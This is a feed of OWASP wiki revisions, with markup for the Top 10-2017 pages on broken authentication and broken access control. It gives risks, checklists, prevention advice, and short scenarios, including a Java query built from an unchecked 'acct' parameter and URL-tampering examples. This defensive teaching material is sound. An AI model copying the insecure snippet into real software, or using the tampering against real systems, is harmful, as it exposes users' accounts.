		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Top_10-2017_A2-Broken_Authentication&amp;diff=229066"/>
				<updated>2017-04-24T01:42:12Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Top_10_2013:TopTemplate&lt;br /&gt;
    |usenext=2013NextLink&lt;br /&gt;
    |next=A3-{{Top_10_2010:ByTheNumbers&lt;br /&gt;
              |3&lt;br /&gt;
              |year=2017&lt;br /&gt;
              |language=en}}&lt;br /&gt;
    |useprev=2013PrevLink&lt;br /&gt;
    |prev=A1-{{Top_10_2010:ByTheNumbers&lt;br /&gt;
              |1&lt;br /&gt;
              |year=2017&lt;br /&gt;
              |language=en}}&lt;br /&gt;
    |year=2017&lt;br /&gt;
    |language=en&lt;br /&gt;
}}&lt;br /&gt;
&lt;br /&gt;
{{Top_10_2010:SummaryTableHeaderBeginTemplate|year=2017|language=en}}&lt;br /&gt;
{{Top_10:SummaryTableTemplate|exploitability=2|prevalence=2|detectability=2|impact=1|year=2017|language=en}}&lt;br /&gt;
{{Top_10_2010:SummaryTableHeaderEndTemplate|year=2017}}&lt;br /&gt;
     &amp;lt;td {{Template:Top 10 2010:SummaryTableRowStyleTemplate|year=2017}}&amp;gt;&lt;br /&gt;
Consider anonymous external attackers, as well as authorized users, who may attempt to steal accounts from others. Also consider insiders wanting to disguise their actions.&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
     &amp;lt;td {{Template:Top 10 2010:SummaryTableRowStyleTemplate|year=2017}}&amp;gt;&lt;br /&gt;
Attackers use leaks or flaws in the authentication or session management functions (e.g., exposed accounts, passwords, session IDs) to temporarily or permanently impersonate users.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
     &amp;lt;td colspan=2  {{Template:Top 10 2010:SummaryTableRowStyleTemplate|year=2017}}&amp;gt;&lt;br /&gt;
Developers frequently build custom authentication and session management schemes, but building these correctly is hard. As a result, these custom schemes frequently have flaws in areas such as logout, create account, change password, forgot password, timeouts, remember me, secret question, account update, etc. Finding such flaws can sometimes be difficult, as each implementation is unique.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
     &amp;lt;td {{Template:Top 10 2010:SummaryTableRowStyleTemplate|year=2017}}&amp;gt;&lt;br /&gt;
Such flaws may allow some or even all accounts to be attacked. Once successful, the attacker can do anything the victim could do. Privileged accounts are frequently targeted.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
     &amp;lt;td {{Template:Top 10 2010:SummaryTableRowStyleTemplate|year=2017}}&amp;gt;&lt;br /&gt;
Consider the business value of the affected data or application functions.&lt;br /&gt;
&lt;br /&gt;
Also consider the business impact of public exposure of the vulnerability.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
{{Top_10_2010:SummaryTableEndTemplate|year=2017}}&lt;br /&gt;
&lt;br /&gt;
{{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|number=1|risk=2|year=2017|language=en}}&lt;br /&gt;
Are session management assets like user credentials and session IDs properly protected? You may be vulnerable if:&lt;br /&gt;
# User authentication credentials aren’t properly protected when stored using hashing or encryption. See &amp;lt;u&amp;gt;[[{{Top_10:LanguageFile|text=documentRootTop10|language=en|year=2017 }}-A6-{{Top_10_2010:ByTheNumbers|6|year=2017|language=en}}|2017-A6]]&amp;lt;/u&amp;gt;.&lt;br /&gt;
# Credentials can be guessed or overwritten through weak account management functions (e.g., account creation, change password, recover password, weak session IDs).&lt;br /&gt;
# Session IDs are exposed in the URL (e.g., URL rewriting).&lt;br /&gt;
# Session IDs are vulnerable to &amp;lt;u&amp;gt;[[Session_fixation | session fixation]]&amp;lt;/u&amp;gt; attacks.&lt;br /&gt;
# Session IDs don’t timeout, or user sessions or authentication tokens (particularly single sign-on (SSO) tokens) aren’t properly invalidated during logout.&lt;br /&gt;
# Session IDs aren’t rotated after successful login.&lt;br /&gt;
# Passwords, session IDs, and other credentials are sent over unencrypted connections. See &amp;lt;u&amp;gt;[[{{Top_10:LanguageFile|text=documentRootTop10|language=en|year=2017 }}-A6-{{Top_10_2010:ByTheNumbers|6|year=2017|language=en}}|2017-A6]]&amp;lt;/u&amp;gt;.&lt;br /&gt;
See the &amp;lt;u&amp;gt;[[ASVS]]&amp;lt;/u&amp;gt; requirement areas V2 and V3 for more details.&lt;br /&gt;
&lt;br /&gt;
{{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|number=2|risk=2|year=2017|language=en}}&lt;br /&gt;
The primary recommendation for an organization is to make available to developers:&lt;br /&gt;
&amp;lt;ol&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;'''A single set of strong authentication and session management controls.''' Such controls should strive to:&lt;br /&gt;
&amp;lt;ol type=&amp;quot;a&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;meet all the authentication and session management requirements defined in OWASP’s &amp;lt;u&amp;gt;[[ASVS|Application Security Verification Standard (ASVS)]]&amp;lt;/u&amp;gt; areas V2 (Authentication) and V3 (Session Management).&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;have a simple interface for developers. Consider the &amp;lt;u&amp;gt;[https://static.javadoc.io/org.owasp.esapi/esapi/2.1.0.1/org/owasp/esapi/Authenticator.html ESAPI Authenticator and User APIs]&amp;lt;/u&amp;gt; as good examples to emulate, use, or build upon.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ol&amp;gt;&lt;br /&gt;
&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Strong efforts should also be made to avoid XSS flaws which can be used to steal session IDs. See &amp;lt;u&amp;gt;[[{{Top_10:LanguageFile|text=documentRootTop10|language=en|year=2017 }}-A3-{{Top_10_2010:ByTheNumbers|3|year=2017|language=en}}|2017-A3]]&amp;lt;/u&amp;gt;.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ol&amp;gt;&lt;br /&gt;
{{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|number=3|risk=2|year=2017|language=en}}&lt;br /&gt;
&amp;lt;u&amp;gt;'''Scenario #1:'''&amp;lt;/u&amp;gt; Airline reservations application supports URL rewriting, putting session IDs in the URL:&lt;br /&gt;
{{Top_10_2010:ExampleBeginTemplate|year=2017}}&amp;lt;b&amp;gt;&amp;lt;nowiki&amp;gt;h&amp;lt;/nowiki&amp;gt;ttp://example.com/sale/saleitems&amp;lt;span style=&amp;quot;color: red;&amp;quot;&amp;gt;;&amp;lt;br/&amp;gt;sessionid=268544541&amp;lt;/span&amp;gt;&amp;amp;dest=Hawaii&amp;lt;/b&amp;gt;&lt;br /&gt;
{{Top_10_2010:ExampleEndTemplate|year=2017}}&lt;br /&gt;
An authenticated user of the site wants to let their friends know about the sale. User e-mails the above link without knowing they are also giving away their session ID. When the friends use the link they use user’s session and credit card.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;'''Scenario #2''':&amp;lt;/u&amp;gt; Application’s timeouts aren’t set properly. User uses a public computer to access site. Instead of selecting “logout” the user simply closes the browser tab and walks away. An attacker uses the same browser an hour later, and that browser is still authenticated.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;'''Scenario #3''':&amp;lt;/u&amp;gt; An insider or external attacker gains access to the system’s password database. User passwords are not properly hashed and salted, exposing every users’ password.&lt;br /&gt;
&lt;br /&gt;
{{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|number=4|risk=2|year=2017|language=en}}&lt;br /&gt;
{{Top_10_2010:SubSubsectionOWASPReferencesTemplate|year=2017}}&amp;lt;br/&amp;gt;&lt;br /&gt;
For a more complete set of requirements and problems to avoid in this area, see the &amp;lt;u&amp;gt;[[ASVS | ASVS requirements areas for Authentication (V2) and Session Management (V3)]]&amp;lt;/u&amp;gt;.&lt;br /&gt;
* &amp;lt;u&amp;gt;[[Authentication_Cheat_Sheet | OWASP Authentication Cheat Sheet]]&amp;lt;/u&amp;gt;&lt;br /&gt;
* &amp;lt;u&amp;gt;[[Forgot_Password_Cheat_Sheet | OWASP Forgot Password Cheat Sheet]]&amp;lt;/u&amp;gt;&lt;br /&gt;
* &amp;lt;u&amp;gt;[[Password_Storage_Cheat_Sheet|OWASP Password Storage Cheat Sheet]]&amp;lt;/u&amp;gt;&lt;br /&gt;
* &amp;lt;u&amp;gt;[[Session_Management_Cheat_Sheet | OWASP Session Management Cheat Sheet]]&amp;lt;/u&amp;gt;&lt;br /&gt;
* &amp;lt;u&amp;gt;[[Testing_for_authentication | OWASP Testing Guide: Chapter on Authentication]]&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{Top_10_2010:SubSubsectionExternalReferencesTemplate|year=2017|language=en}}&lt;br /&gt;
* &amp;lt;u&amp;gt;[http://cwe.mitre.org/data/definitions/287.html CWE Entry 287 on Improper Authentication]&amp;lt;/u&amp;gt;&lt;br /&gt;
* &amp;lt;u&amp;gt;[http://cwe.mitre.org/data/definitions/384.html CWE Entry 384 on Session Fixation]&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{Top_10_2013:BottomAdvancedTemplate&lt;br /&gt;
    |type={{Top_10_2010:StyleTemplate}}&lt;br /&gt;
    |usenext=2013NextLink&lt;br /&gt;
    |next=A3-{{Top_10_2010:ByTheNumbers&lt;br /&gt;
              |3&lt;br /&gt;
              |year=2017&lt;br /&gt;
              |language=en}}&lt;br /&gt;
    |useprev=2013PrevLink&lt;br /&gt;
    |prev=A1-{{Top_10_2010:ByTheNumbers&lt;br /&gt;
              |1&lt;br /&gt;
              |year=2017&lt;br /&gt;
              |language=en}}&lt;br /&gt;
    |year=2017&lt;br /&gt;
    |language=en&lt;br /&gt;
}}&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Top_10-2017_A2-Broken_Authentication&amp;diff=229016</id>
		<title>Top 10-2017 A2-Broken Authentication</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Top_10-2017_A2-Broken_Authentication&amp;diff=229016"/>
				<updated>2017-04-22T23:25:21Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Top_10_2013:TopTemplate&lt;br /&gt;
    |usenext=2013NextLink&lt;br /&gt;
    |next=A3-{{Top_10_2010:ByTheNumbers&lt;br /&gt;
              |3&lt;br /&gt;
              |year=2017&lt;br /&gt;
              |language=en}}&lt;br /&gt;
    |useprev=2013PrevLink&lt;br /&gt;
    |prev=A1-{{Top_10_2010:ByTheNumbers&lt;br /&gt;
              |1&lt;br /&gt;
              |year=2017&lt;br /&gt;
              |language=en}}&lt;br /&gt;
    |year=2017&lt;br /&gt;
    |language=en&lt;br /&gt;
}}&lt;br /&gt;
&lt;br /&gt;
{{Top_10_2010:SummaryTableHeaderBeginTemplate|year=2017|language=en}}&lt;br /&gt;
{{Top_10:SummaryTableTemplate|exploitability=2|prevalence=2|detectability=2|impact=1|year=2017|language=en}}&lt;br /&gt;
{{Top_10_2010:SummaryTableHeaderEndTemplate|year=2017}}&lt;br /&gt;
     &amp;lt;td {{Template:Top 10 2010:SummaryTableRowStyleTemplate|year=2017}}&amp;gt;&lt;br /&gt;
Consider anonymous external attackers, as well as authorized users, who may attempt to steal accounts from others. Also consider insiders wanting to disguise their actions.&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
     &amp;lt;td {{Template:Top 10 2010:SummaryTableRowStyleTemplate|year=2017}}&amp;gt;&lt;br /&gt;
Attackers use leaks or flaws in the authentication or session management functions (e.g., exposed accounts, passwords, session IDs) to temporarily or permanently impersonate users.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
     &amp;lt;td colspan=2  {{Template:Top 10 2010:SummaryTableRowStyleTemplate|year=2017}}&amp;gt;&lt;br /&gt;
Developers frequently build custom authentication and session management schemes, but building these correctly is hard. As a result, these custom schemes frequently have flaws in areas such as logout, create account, change password, forgot password, timeouts, remember me, secret question, account update, etc. Finding such flaws can sometimes be difficult, as each implementation is unique.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
     &amp;lt;td {{Template:Top 10 2010:SummaryTableRowStyleTemplate|year=2017}}&amp;gt;&lt;br /&gt;
Such flaws may allow some or even all accounts to be attacked. Once successful, the attacker can do anything the victim could do. Privileged accounts are frequently targeted.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
     &amp;lt;td {{Template:Top 10 2010:SummaryTableRowStyleTemplate|year=2017}}&amp;gt;&lt;br /&gt;
Consider the business value of the affected data or application functions.&lt;br /&gt;
&lt;br /&gt;
Also consider the business impact of public exposure of the vulnerability.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
{{Top_10_2010:SummaryTableEndTemplate|year=2017}}&lt;br /&gt;
&lt;br /&gt;
{{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|number=1|risk=2|year=2017|language=en}}&lt;br /&gt;
Are session management assets like user credentials and session IDs properly protected? You may be vulnerable if:&lt;br /&gt;
# User authentication credentials aren’t properly protected when stored using hashing or encryption. See 2017-A6.&lt;br /&gt;
# Credentials can be guessed or overwritten through weak account management functions (e.g., account creation, change password, recover password, weak session IDs).&lt;br /&gt;
# Session IDs are exposed in the URL (e.g., URL rewriting).&lt;br /&gt;
#  Session IDs are vulnerable to [[Session_fixation | session fixation]] attacks.&lt;br /&gt;
# Session IDs don’t timeout, or user sessions or authentication tokens (particularly single sign-on (SSO) tokens) aren’t properly invalidated during logout.&lt;br /&gt;
# Session IDs aren’t rotated after successful login.&lt;br /&gt;
# Passwords, session IDs, and other credentials are sent over unencrypted connections. See 2017-A6.&lt;br /&gt;
See the [[ASVS]] requirement areas V2 and V3 for more details.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|number=2|risk=2|year=2017|language=en}}&lt;br /&gt;
The primary recommendation for an organization is to make available to developers:&lt;br /&gt;
&amp;lt;ol&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;'''A single set of strong authentication and session management controls.''' Such controls should strive to:&lt;br /&gt;
&amp;lt;ol type=&amp;quot;a&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;meet all the authentication and session management requirements defined in OWASP’s [https://www.owasp.org/index.php/ASVS Application Security Verification Standard (ASVS)] areas V2 (Authentication) and V3 (Session Management).&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;have a simple interface for developers. Consider the [https://static.javadoc.io/org.owasp.esapi/esapi/2.1.0.1/org/owasp/esapi/Authenticator.html ESAPI Authenticator and User APIs] as good examples to emulate, use, or build upon.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ol&amp;gt;&lt;br /&gt;
&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Strong efforts should also be made to avoid XSS flaws which can be used to steal session IDs. See 2017-A3.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ol&amp;gt;&lt;br /&gt;
{{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|number=3|risk=2|year=2017|language=en}}&lt;br /&gt;
'''Scenario #1:''' Airline reservations application supports URL rewriting, putting session IDs in the URL:&lt;br /&gt;
{{Top_10_2010:ExampleBeginTemplate|year=2017}}&amp;lt;nowiki&amp;gt;h&amp;lt;/nowiki&amp;gt;ttp://example.com/sale/saleitems&amp;lt;span style=&amp;quot;color: red;&amp;quot;&amp;gt;?sessionid=268544541&amp;lt;/span&amp;gt;&amp;amp;dest=Hawaii&lt;br /&gt;
{{Top_10_2010:ExampleEndTemplate|year=2017}}&lt;br /&gt;
An authenticated user of the site wants to let their friends know about the sale. User e-mails the above link without knowing they are also giving away their session ID. When the friends use the link they use user’s session and credit card.&lt;br /&gt;
'''Scenario #2''': Application’s timeouts aren’t set properly. User uses a public computer to access site. Instead of selecting “logout” the user simply closes the browser tab and walks away. An attacker uses the same browser an hour later, and that browser is still authenticated.&lt;br /&gt;
'''Scenario #3''': An insider or external attacker gains access to the system’s password database. User passwords are not properly hashed and salted, exposing every users’ password.&lt;br /&gt;
&lt;br /&gt;
{{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|number=4|risk=2|year=2017|language=en}}&lt;br /&gt;
{{Top_10_2010:SubSubsectionOWASPReferencesTemplate|year=2017}}&amp;lt;br/&amp;gt;&lt;br /&gt;
For a more complete set of requirements and problems to avoid in this area, see the [[ASVS | ASVS requirements areas for Authentication (V2) and Session Management (V3)]].&lt;br /&gt;
* [[Authentication_Cheat_Sheet | OWASP Authentication Cheat Sheet]]&lt;br /&gt;
* [[Forgot_Password_Cheat_Sheet | OWASP Forgot Password Cheat Sheet]]&lt;br /&gt;
* [[Password_Storage_Cheat_Sheet|OWASP Password Storage Cheat Sheet]]&lt;br /&gt;
* [[Session_Management_Cheat_Sheet | OWASP Session Management Cheat Sheet]]&lt;br /&gt;
* [[Testing_for_authentication | OWASP Testing Guide: Chapter on Authentication]]&lt;br /&gt;
&lt;br /&gt;
{{Top_10_2010:SubSubsectionExternalReferencesTemplate|year=2017|language=en}}&lt;br /&gt;
* [http://cwe.mitre.org/data/definitions/287.html CWE Entry 287 on Improper Authentication]&lt;br /&gt;
* [http://cwe.mitre.org/data/definitions/384.html CWE Entry 384 on Session Fixation]&lt;br /&gt;
&lt;br /&gt;
{{Top_10_2013:BottomAdvancedTemplate&lt;br /&gt;
    |type={{Top_10_2010:StyleTemplate}}&lt;br /&gt;
    |usenext=2013NextLink&lt;br /&gt;
    |next=A3-{{Top_10_2010:ByTheNumbers&lt;br /&gt;
              |3&lt;br /&gt;
              |year=2017&lt;br /&gt;
              |language=en}}&lt;br /&gt;
    |useprev=2013PrevLink&lt;br /&gt;
    |prev=A1-{{Top_10_2010:ByTheNumbers&lt;br /&gt;
              |1&lt;br /&gt;
              |year=2017&lt;br /&gt;
              |language=en}}&lt;br /&gt;
    |year=2017&lt;br /&gt;
    |language=en&lt;br /&gt;
}}&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Top_10-2017_A5-Broken_Access_Control&amp;diff=229012</id>
		<title>Top 10-2017 A5-Broken Access Control</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Top_10-2017_A5-Broken_Access_Control&amp;diff=229012"/>
				<updated>2017-04-22T23:14:52Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Top_10_2013:TopTemplate&lt;br /&gt;
    |usenext=2013NextLink&lt;br /&gt;
    |next=A5-{{Top_10_2010:ByTheNumbers&lt;br /&gt;
              |5&lt;br /&gt;
              |year=2017&lt;br /&gt;
              |language=en}}&lt;br /&gt;
    |useprev=2013PrevLink&lt;br /&gt;
    |prev=A3-{{Top_10_2010:ByTheNumbers&lt;br /&gt;
              |3&lt;br /&gt;
              |year=2017&lt;br /&gt;
              |language=en}}&lt;br /&gt;
    |year=2017&lt;br /&gt;
    |language=en&lt;br /&gt;
}}&lt;br /&gt;
&lt;br /&gt;
{{Top_10_2010:SummaryTableHeaderBeginTemplate|year=2017|language=en}}&lt;br /&gt;
 {{Top_10:SummaryTableTemplate|exploitability=1|prevalence=1|detectability=1|impact=2|year=2017|language=en}}&lt;br /&gt;
{{Top_10_2010:SummaryTableHeaderEndTemplate|year=2017}}&lt;br /&gt;
     &amp;lt;td {{Template:Top 10 2010:SummaryTableRowStyleTemplate|year=2017}}&amp;gt;&lt;br /&gt;
&amp;lt;!--- Threat Agents: ---&amp;gt;&lt;br /&gt;
Consider the types of authorized users of your system. Are users restricted to certain functions and data? Are unauthenticated users allowed access to any functionality or data?&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
     &amp;lt;td {{Template:Top 10 2010:SummaryTableRowStyleTemplate|year=2017}}&amp;gt;&lt;br /&gt;
&amp;lt;!--- Attack Vectors ---&amp;gt;&lt;br /&gt;
Attackers, who are authorized users, simply change a parameter value to another resource they aren’t authorized for. Is access to this functionality or data granted?&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
     &amp;lt;td colspan=2  {{Template:Top 10 2010:SummaryTableRowStyleTemplate|year=2017}}&amp;gt;&lt;br /&gt;
&amp;lt;!--- Security Weakness ---&amp;gt;&lt;br /&gt;
For data, applications and APIs frequently use the actual name or key of an object when generating web pages. For functions, URLs and function names are frequently easy to guess. Applications and APIs don’t always verify the user is authorized for the target resource. This results in an access control flaw. Testers can easily manipulate parameters to detect such flaws. Code analysis quickly shows whether authorization is correct.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
     &amp;lt;td {{Template:Top 10 2010:SummaryTableRowStyleTemplate|year=2017}}&amp;gt;&lt;br /&gt;
&amp;lt;!--- Technical Impacts ---&amp;gt;&lt;br /&gt;
Such flaws can compromise all the functionality or data that is accessible. Unless references are unpredictable, or access control is enforced, data and functionality can be stolen, or abused.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
     &amp;lt;td {{Template:Top 10 2010:SummaryTableRowStyleTemplate|year=2017}}&amp;gt;&lt;br /&gt;
&amp;lt;!--- Business Impacts  ---&amp;gt;&lt;br /&gt;
Consider the business value of the exposed data and functionality.&lt;br /&gt;
&lt;br /&gt;
Also consider the business impact of public exposure of the vulnerability.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
{{Top_10_2010:SummaryTableEndTemplate|year=2017}}&lt;br /&gt;
&lt;br /&gt;
{{Top_10:SubsectionTableBeginTemplate|year=2017|type=main}} {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=vulnerableTo|position=firstLeft|risk=4|year=2017|language=en}}&lt;br /&gt;
The best way to find out if an application is vulnerable to access control vulnerabilities is to verify that all data and function references have appropriate defenses. To determine if you are vulnerable, consider:&lt;br /&gt;
# For '''data''' references, does the application ensure the user is authorized by using a reference map or access control check to ensure the user is authorized for that data?&lt;br /&gt;
# For non-public '''function''' requests, does the application ensure the user is authenticated, and has the required roles or privileges to use that function?&lt;br /&gt;
Code review of the application can verify whether these controls are implemented correctly and are present everywhere they are required. Manual testing is also effective for identifying access control flaws. Automated tools typically do not look for such flaws because they cannot recognize what requires protection or what is safe or unsafe.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=howPrevent|position=right|risk=4|year=2017|language=en}}&lt;br /&gt;
Preventing access control flaws requires selecting an approach for protecting each function and each type of data (e.g., object number, filename).&lt;br /&gt;
# '''Check access'''. Each use of a direct reference from an untrusted source must include an access control check to ensure the user is authorized for the requested resource.&lt;br /&gt;
# '''Use per user or session indirect object references'''. This coding pattern prevents attackers from directly targeting unauthorized resources. For example, instead of using the resource’s database key, a drop down list of six resources authorized for the current user could use the numbers 1 to 6 to indicate which value the user selected. OWASP’s [[ESAPI]] includes both sequential and random access reference maps that developers can use to eliminate direct object references.&lt;br /&gt;
# '''Automated verification'''. Leverage automation to verify proper authorization deployment. This is often custom.&lt;br /&gt;
&lt;br /&gt;
{{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=example|position=left|risk=4|year=2017|language=en}}&lt;br /&gt;
'''Scenario #1:''' The application uses unverified data in a SQL call that is accessing account information:&lt;br /&gt;
&lt;br /&gt;
{{Top_10_2010:ExampleBeginTemplate|year=2017}}&amp;lt;span style=&amp;quot;color:red;&amp;quot;&amp;gt;pstmt.setString( 1, request.getParameter(&amp;quot;acct&amp;quot;));&amp;lt;/span&amp;gt;&lt;br /&gt;
ResultSet results = pstmt.executeQuery( );&lt;br /&gt;
{{Top_10_2010:ExampleEndTemplate}}&lt;br /&gt;
An attacker simply modifies the ‘acct’ parameter in the browser to send whatever account number they want. If not properly verified, the attacker can access any user’s account.&lt;br /&gt;
{{Top_10_2010:ExampleBeginTemplate|year=2017}}&amp;lt;nowiki&amp;gt;&lt;br /&gt;
http://example.com/app/accountInfo?acct=&amp;lt;/nowiki&amp;gt;&amp;lt;span style=&amp;quot;color:red;&amp;quot;&amp;gt;notmyacct&amp;lt;/span&amp;gt;&lt;br /&gt;
{{Top_10_2010:ExampleEndTemplate}}&lt;br /&gt;
'''Scenario #2:''' An attacker simply force browses to target URLs. Admin rights are also required for access to the admin page.&lt;br /&gt;
{{Top_10_2010:ExampleBeginTemplate|year=2017}}&amp;lt;nowiki&amp;gt;http://example.com/app/getappInfo&lt;br /&gt;
http://example.com/app/admin_getInfo&amp;lt;/nowiki&amp;gt;{{Top_10_2010:ExampleEndTemplate}}&lt;br /&gt;
If an unauthenticated user can access either page, it’s a flaw. If a non-admin can access the admin page, this is also a flaw.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!--- {{Top_10_2010:ExampleBeginTemplate|year=2017}} &lt;br /&gt;
{{Top_10_2010:ExampleEndTemplate}} ---&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=references|position=right|risk=4|year=2017|language=en}}&lt;br /&gt;
{{Top_10_2010:SubSubsectionOWASPReferencesTemplate|year=2017}}&lt;br /&gt;
* [[Top_10_2007-Insecure_Direct_Object_Reference|OWASP Top 10-2007 on Insecure Direct Object References]]&lt;br /&gt;
* [[Top_10_2007-Failure_to_Restrict_URL_Access|OWASP Top 10-2007 on Function Level Access Control]]&lt;br /&gt;
* [https://static.javadoc.io/org.owasp.esapi/esapi/2.1.0.1/org/owasp/esapi/AccessReferenceMap.html ESAPI Access Reference Map API]&lt;br /&gt;
* [https://static.javadoc.io/org.owasp.esapi/esapi/2.1.0.1/org/owasp/esapi/AccessController.html ESAPI Access Control API] (See isAuthorizedForData(), isAuthorizedForFile(), isAuthorizedForFunction() )&lt;br /&gt;
For additional access control requirements, see the [[ASVS|ASVS requirements area for Access Control (V4)]].&lt;br /&gt;
&lt;br /&gt;
{{Top_10_2010:SubSubsectionExternalReferencesTemplate|year=2017|language=en}}&lt;br /&gt;
* [http://cwe.mitre.org/data/definitions/285.html CWE Entry 285 on Improper Access Control (Authorization)]&lt;br /&gt;
* [http://cwe.mitre.org/data/definitions/639.html CWE Entry 639 on Insecure Direct Object References]&lt;br /&gt;
* [http://cwe.mitre.org/data/definitions/22.html CWE Entry 22 on Path Traversal] (an example of a Direct Object Reference weakness)&lt;br /&gt;
&lt;br /&gt;
{{Top_10_2013:BottomAdvancedTemplate&lt;br /&gt;
    |type={{Top_10_2010:StyleTemplate}}&lt;br /&gt;
    |usenext=2013NextLink&lt;br /&gt;
    |next=A5-{{Top_10_2010:ByTheNumbers&lt;br /&gt;
              |5&lt;br /&gt;
              |year=2017&lt;br /&gt;
              |language=en}}&lt;br /&gt;
    |useprev=2013PrevLink&lt;br /&gt;
    |prev=A3-{{Top_10_2010:ByTheNumbers&lt;br /&gt;
              |3&lt;br /&gt;
              |year=2017&lt;br /&gt;
              |language=en}}&lt;br /&gt;
    |year=2017&lt;br /&gt;
    |language=en&lt;br /&gt;
}}&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Top Ten Project]]&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Top_10-2017_A2-Broken_Authentication&amp;diff=229009</id>
		<title>Top 10-2017 A2-Broken Authentication</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Top_10-2017_A2-Broken_Authentication&amp;diff=229009"/>
				<updated>2017-04-22T23:06:53Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Top_10_2013:TopTemplate&lt;br /&gt;
    |usenext=2013NextLink&lt;br /&gt;
    |next=A3-{{Top_10_2010:ByTheNumbers&lt;br /&gt;
              |3&lt;br /&gt;
              |year=2017&lt;br /&gt;
              |language=en}}&lt;br /&gt;
    |useprev=2013PrevLink&lt;br /&gt;
    |prev=A1-{{Top_10_2010:ByTheNumbers&lt;br /&gt;
              |1&lt;br /&gt;
              |year=2017&lt;br /&gt;
              |language=en}}&lt;br /&gt;
    |year=2017&lt;br /&gt;
    |language=en&lt;br /&gt;
}}&lt;br /&gt;
&lt;br /&gt;
{{Top_10_2010:SummaryTableHeaderBeginTemplate|year=2017|language=en}}&lt;br /&gt;
{{Top_10:SummaryTableTemplate|exploitability=2|prevalence=2|detectability=2|impact=1|year=2017|language=en}}&lt;br /&gt;
{{Top_10_2010:SummaryTableHeaderEndTemplate|year=2017}}&lt;br /&gt;
     &amp;lt;td {{Template:Top 10 2010:SummaryTableRowStyleTemplate|year=2017}}&amp;gt;&lt;br /&gt;
